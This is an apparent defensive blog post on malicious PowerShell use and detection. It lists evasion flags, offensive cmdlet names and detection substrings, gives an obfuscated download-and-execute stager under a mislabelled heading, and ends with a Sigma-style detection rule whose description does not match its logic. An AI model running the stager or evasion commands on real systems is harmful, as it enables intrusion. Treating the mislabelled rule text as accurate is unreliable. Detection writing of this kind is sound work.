Suspicious PowerShell Parameter Substring

What is Powershell and Why is Powershell So Important ?

PowerShell is a framework based on .NET. It offers a commandline shell and a scripting language for automating and managing tasks. PowerShell provides full access to system functions like Windows Management Instrumentation (WMI) and Component Object Model (COM) objects. In addition to this, it has management features for many other functions such as the Microsoft Exchange server, virtual environments like VMware, or Linux environments. The framework became open source in 2016 and is also available for non-Windows platforms.
PowerShell is a powerful scripting language and shell framework primarily used on Windows computers. It has been around for more than 10 years, is used by many system administrators, and will replace the default command prompt on Windows in the future.
PowerShell scripts are frequently used in legitimate administration work. They can also be used to protect computers from attacks and perform analysis. However, attackers are also working with PowerShell to create their own threats.

Why Are Attackers Using PowerSell ?

PowerShell provides easy access to all major functions of the operating system. The versatility of PowerShell makes it an ideal candidate for any purpose, whether the user is a defender or attacker.
In 2011, Matt Graeber released PowerSyringe, which allows easy DLL and shellcode injection into other processes through PowerShell. This research further encouraged penetration testers to develop and use offensive PowerShell scripts.

Top Reasons Why Attackers Use PowerShell ?

      ·         It is installed by default on all new Windows computers.
      ·         It can execute payloads directly from memory, making it stealthy
      ·         It generates few traces by default, making it difficult to find under forensic analysis.
      ·         It has remote access capabilities by default with encrypted traffic.
      ·         As a script, it is easy to obfuscate and difficult to detect with traditional security tools.
      ·         Defenders often overlook it when hardening their systems.
      ·         It can bypass application-whitelisting tools depending on the configuration.
      ·         Many gateway sandboxes do not handle script-based malware well.
      ·         It has a growing community with ready available scripts.
     ·     Many system administrators use and trust the framework, allowing PowerShell malware to blend in with regular administration work.

Running Malware/Virus Commands

In the majority of instances, PowerShell scripts are used post-exploitation as downloaders for additional payloads. While the Restricted execution policy prevents users from running PowerShell scripts with the .ps1 extension, attackers can use other extensions to allow their scripts to be executed.
PowerShell accepts a list of command-line flags. In most cases, malicious scripts use the following arguments to evade detection and bypass local restrictions.

      ·         -NoP/-NoProfile (ignore the commands in the profile file)
      ·         -W Hidden/-WindowStyle Hidden (hide the command window)
      ·         -Exec bypass/-ExecutionPolicy Bypass (ignore the execution policy restriction)
      ·         -NonI/-NonInteractive (do not run an interactive shell)
      ·         -C/-Command (run a single command)
      ·         -F/-File (run commands from a specified file)

Since PowerShell automatically appends the “*” character to the flag argument, a lot of flag keyword abbreviations are possible. For example, instead of using –EncodedCommand, a user could input -enco or -encodedc as they are all interchangeable. This makes it difficult to automatically identify command-line arguments and should be kept in mind when doing pattern matching.
So far, we haven’t seen version arguments used in attacks, which would allow an attacker to downgrade the computer’s PowerShell instance to an older version that doesn’t log as much as newer versions, e.g. “-version 2.0”. Neither have we yet seen malicious usage of the PSConsoleFile command, which loads specified PowerShell console files.

In malicious PowerShell scripts, the most frequently used commands and functions on the command line are:

      ·         (New-Object System.Net.Webclient).DownloadString()
      ·         (New-Object System.Net.Webclient).DownloadFile()
      ·         -IEX / -Invoke-Expression
      ·         Start-Process

The System.Net Webclient class is used to send data to or receive data from remote resources, which is essential for most threats. The class includes the DownloadFile method, which downloads content from a remote location to a local file and the DownloadString method which downloads content from a remote location to a buffer in memory.

Most Known Powershell Attacks

1)      PowerShell Downgrade Attack

The simplest technique is: “PowerShell –Version 2 –Command <…>” (or of course any of the –Version abbreviations).

PowerShell.exe itself is just a simple native application that hosts the CLR, and the –Version switch tells PowerShell which version of the PowerShell assemblies to load.

2)      PowerShell called from an Executable Version Mismatch

3)      Malicious PowerShell Commandlets and Keywords

The following Commandlet names from well-known PowerShell exploitation frameworks

              - Invoke-DllInjection
        - Invoke-Shellcode
        - Invoke-WmiCommand
        - Get-GPPPassword
        - Get-Keystrokes
        - Get-TimedScreenshot
        - Get-VaultCredential
        - Invoke-CredentialInjection
        - Invoke-Mimikatz
        - Invoke-NinjaCopy
        - Invoke-TokenManipulation
        - Out-Minidump
        - VolumeShadowCopyTools
        - Invoke-ReflectivePEInjection
        - Invoke-UserHunter
        - Find-GPOLocation
        - Invoke-ACLScanner
        - Invoke-DowngradeAccount
        - Get-ServiceUnquoted
        - Get-ServiceFilePermission
        - Get-ServicePermission
        - Invoke-ServiceAbuse
        - Install-ServiceBinary
        - Get-RegAutoLogon
        - Get-VulnAutoRun
        - Get-VulnSchTask
        - Get-UnattendedInstallFile
        - Get-WebConfig
        - Get-ApplicationHost
        - Get-RegAlwaysInstallElevated
        - Get-Unconstrained
        - Add-RegBackdoor
        - Add-ScrnSaveBackdoor
        - Gupt-Backdoor
        - Invoke-ADSBackdoor
        - Enabled-DuplicateToken
        - Invoke-PsUaCme
        - Remove-Update
        - Check-VM
        - Get-LSASecret
        - Get-PassHashes
        - Invoke-Mimikatz
        - Show-TargetScreen
        - Port-Scan
        - Invoke-PoshRatHttp
        - Invoke-PowerShellTCP
        - Invoke-PowerShellWMI
        - Add-Exfiltration
        - Add-Persistence
        - Do-Exfiltration
        - Start-CaptureServer
        - Invoke-DllInjection
        - Invoke-ReflectivePEInjection
        - Invoke-ShellCode
        - Get-ChromeDump
        - Get-ClipboardContents
        - Get-FoxDump
        - Get-IndexedItem
        - Get-Keystrokes
        - Get-Screenshot
        - Invoke-Inveigh
        - Invoke-NetRipper
        - Invoke-NinjaCopy
        - Out-Minidump
        - Invoke-EgressCheck
        - Invoke-PostExfil
        - Invoke-PSInject
        - Invoke-RunAs
        - MailRaider
        - New-HoneyHash
        - Set-MacAttribute
        - Get-VaultCredential
        - Invoke-DCSync
        - Invoke-Mimikatz
        - Invoke-PowerDump
        - Invoke-TokenManipulation
        - Exploit-Jboss
        - Invoke-ThunderStruck
        - Invoke-VoiceTroll
        - Set-Wallpaper
        - Invoke-InveighRelay
        - Invoke-PsExec
        - Invoke-SSHCommand
        - Get-SecurityPackages
        - Install-SSP
        - Invoke-BackdoorLNK
        - PowerBreach
        - Get-GPPPassword
        - Get-SiteListPassword
        - Get-System
        - Invoke-BypassUAC
        - Invoke-Tater
        - Invoke-WScriptBypassUAC
        - PowerUp
        - PowerView
        - Get-RickAstley
        - Find-Fruit
        - HTTP-Login
        - Find-TrustedDocuments
        - Invoke-Paranoia
        - Invoke-WinEnum
        - Invoke-ARPScan
        - Invoke-PortScan
        - Invoke-ReverseDNSLookup
        - Invoke-SMBScanner
        - Invoke-Mimikittenz

4)      NTFS Alternate Data Stream

Starting with PowerShell 3.0, you can read and write NTFS alternate data streams.

You can add additional information to alternate (hidden) streams if the file is stored on an NTFS volume

Add-Content -Path $file -Value 'Secret Information' -Stream 'secretStream'
Get-Content -Path $file
Get-Content -Path $file -Stream 'secretStream'

       This is what the result will look like
            PS> Get-Content -Path $file

PS> Get-Content -Path $file -Stream 'secretStream'
Secret Information

As you can see, Get-Content can now retrieve two pieces of information: one is stored inside the text file, the other one comes from the NTFS Alternate Data Stream.

           5)      PowerShell Credential Prompt
pOWerSheLl.exe pOWerSheLl.exe -nop -win hidden -noni -enc [SYsTeM.Net.SERVICEPOINTMANaGEr]::EXPEcT100ContiNuE = 0;$WC=New-OBJect SySTEm.NET.WebClIEnT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HeAdeRs.AdD('User-Agent',$u);$wC.PrOxy = [SYSTEm.NeT.WeBReQueSt]::DEfAuLtWEbPrOXy;$WC.Proxy.CREdENtIALs = [SySTem.NEt.CREdEnTiaLCacHE]::DEfAuLTNEtworkCREdeNtiaLs;$K='S&q>*4GMb?`}0]9IW2<:OpyV1v/\fJre';$i=0;[chaR[]]$B=([chaR[]]($wc.DOwnLoAdStriNg("")))|%{$_-BXoR$K[$I++%$K.LEnGtH]};IEX ($b-jOIN'')

           6)      PowerShell PSAttack

            PSAttack is a PowerShell hack tool

           7)      Suspicious PowerShell Download


           8)      Suspicious PowerShell Invocations – Generic
                 -w hidden
        -window hidden
        -windowstyle hidden

          9)      Suspicious PowerShell Invocations - Specific
           - ' -nop -w hidden -c * [Convert]::FromBase64String'
           - ' -w hidden -noni -nop -c "iex(New-Object'
           - ' -w hidden -ep bypass -Enc'
           - 'powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run'
           - 'bypass -noprofile -windowstyle hidden (new-object'
           - 'iex(New-Object Net.WebClient).Download'


By far the most prevalent delivery and execution vehicle for malware in the industry today is basic malicious executables and malicious documents. While not represented accurately by its popularity in the news, a small portion of the current malware ecosystem leverages PowerShell as part of its attack chain. Of malware that uses PowerShell, the most prevalent use is the garden-variety stager: an executable or document macro that launches PowerShell to download another executable and run it.
Despite its relative statistical rarity, development of malicious and offense-focused PowerShell techniques has been a rich field of innovation. Today's commercial products are already taking measures on this issue in several ways. Because they are often delivered as script files , Antivirus vendors have long had the ability to write signatures that block malicious PowerShell scripts. In addition to antivirus signatures, many SIEM vendors have started to implement alerting based on command-line parameters that are frequently used in malicious contexts.
As with any ecosystem, parts of the malicious and offense-focused community have started to adapt their tooling to avoid signature-based detections. Part of this response has come through an increased use of content obfuscation – a technique long employed at both the binary and content level by traditional malware authors.


There are multiple ways to enable logging for PowerShell based on the version of the PowerShell and operating system used.

  • If you just enabling and logging 4688 event id, it is possible to effectively detect the PowerShell attacks.
  • Yes, it will generate a lot of events .But applying we can log and monitor only the logs of interest, if you applying basic filtering techniques.
  • By default, Process Creation audit is disabled .  You need to enable this feature in GPO (Group Policy Management).
  • Also you should log Command Line parameters which are passed at the time of process creation. You need to enable this feature in GPO (Group Policy Management).
  • Process_Command_Line gives information about the command line parameters that are passed to the newly created process – i.e. Powershell. We can create the alert based on the frequently used parameters like –e, -Encod, -windowstyle , Bypass , -c , -command etc.

Indicators of Compromise

Typically, when we run PowerShell using windows start menu or from its location on the disk, it starts under explorer.exe – you can see parent-child relationship tree using Process Explorer OR Process Hacker on your system.

it looks like as shown in above – Explorer.exe is the parent process to the Powershell.exe

Most of the times, in PowerShell attacks, PowerShell script / commands launched through command line process – therefore, we usually have observed that the parent process to the Powershell Process is cmd.exe in the attacks which are in the wild.

Therefore, it is important to have a look at the Grandparent process as well like – who spawned the cmd.exe – that will give you an indication if this could be part of the attack.
So, if the Grandparent process is winword.exe, mshta.exe, wscript.exe, wuapp.exe – then it is a fair indication that cmd.exe is spawned by a script and that script is worth to look at. This kind of behavior typically seen in Phishing cases where user clicked/opened the word document which has embedded macro (vbscript) in it which spawns the PowerShell process to download the malicious content from the web.
Many of the Powershell attacks can be detected by just monitoring command line parameters passed along with the PowerShell process.


        - ' -windowstyle h '
        - ' -windowstyl h'
        - ' -windowsty h'
        - ' -windowst h'
        - ' -windows h'
        - ' -windo h'
        - ' -wind h'
        - ' -win h'
        - ' -wi h'
        - ' -win h '
        - ' -win hi '
        - ' -win hid '
        - ' -win hidd '
        - ' -win hidde '
        - ' -NoPr '
        - ' -NoPro '
        - ' -NoProf '
        - ' -NoProfi '
        - ' -NoProfil '
        - ' -nonin '
        - ' -nonint '
        - ' -noninte '
        - ' -noninter '
        - ' -nonintera '
        - ' -noninterac '
        - ' -noninteract '
        - ' -noninteracti '
        - ' -noninteractiv '
        - ' -ec '
        - ' -encodedComman '
        - ' -encodedComma '
        - ' -encodedComm '
        - ' -encodedCom '
        - ' -encodedCo '
        - ' -encodedC '
        - ' -encoded '
        - ' -encode '
        - ' -encod '
        - ' -enco '
        - ' -en '



CSIM-ID: 83237
Suspicious PowerShell Parameter Substring
Description:  Detects UAC bypass method using Windows event viewer
Author: Burak Çayır
Date: 7.8.2018
            Image : '*\powershell.exe'
            CommandLine :
           - ' -windowstyle h '
           - ' -windowstyl h'
           - ' -windowsty h'
           - ' -windowst h'
           - ' -windows h'
           - ' -windo h'
           - ' -wind h'
           - ' -win h'
           - ' -wi h'
           - ' -win h '
           - ' -win hi '
           - ' -win hid '
           - ' -win hidd '
           - ' -win hidde '
           - ' -NoPr '
           - ' -NoPro '
           - ' -NoProf '
           - ' -NoProfi '
           - ' -NoProfil '
           - ' -nonin '
           - ' -nonint '
           - ' -noninte '
           - ' -noninter '
           - ' -nonintera '
           - ' -noninterac '
           - ' -noninteract '
           - ' -noninteracti '
           - ' -noninteractiv '
           - ' -ec '
           - ' -encodedComman '
           - ' -encodedComma '
           - ' -encodedComm '
           - ' -encodedCom '
           - ' -encodedCo '
           - ' -encodedC '
           - ' -encoded '
           - ' -encode '
           - ' -encod '
           - ' -enco '
           - ' -en '

    Condition: all of them

Burak Çayır


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